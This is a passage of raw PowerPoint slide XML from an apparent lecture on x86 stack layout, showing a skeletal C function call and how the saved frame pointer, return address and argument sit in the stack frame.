          <p:cNvPr id="386" name="Shape 386"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205050" y="5332400"/>
            <a:ext cx="882900" cy="307500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="387" name="Shape 387"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="386" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7992350" y="5486150"/>
            <a:ext cx="212700" cy="39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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>x86 Stack Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Shape 393"/>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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Starting in main, $EIP eventually gets to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the function call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int function(char *buf){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  int var1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  char buf2[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  // some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> if(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400" u="sng"/>
              <a:t>function(argv[1])</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	  // do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Shape 394"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941969" y="1757700"/>
            <a:ext cx="2050200" cy="4770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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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l">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rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Shape 395"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="6295550"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[high memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Shape 396"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="1571150"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[low memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="397" name="Shape 397"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2327350" y="2114000"/>
            <a:ext cx="2351400" cy="2807700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Shape 398"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4041725" y="3836350"/>
            <a:ext cx="1824600" cy="1635900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>And the stack has no variables for the function up till this point. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Shape 399"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205050" y="5332400"/>
            <a:ext cx="882900" cy="307500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="400" name="Shape 400"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="399" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7992350" y="5486150"/>
            <a:ext cx="212700" cy="39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Shape 405"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>x86 Stack Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Shape 406"/>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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The compiled assembly code will push onto </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the stack: the function parameters, the saved frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pointer, and the return address, as such</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int function(char *buf){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  int var1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  char buf2[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  // some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> if(function(argv[1]) )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	  // do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Shape 407"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941969" y="1757700"/>
            <a:ext cx="2050200" cy="4770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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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l">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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*buf (function's argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Shape 408"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="6295550"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[high memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Shape 409"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="1571150"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[low memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="410" name="Shape 410"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2382275" y="3875575"/>
            <a:ext cx="3476100" cy="1337100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="411" name="Shape 411"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
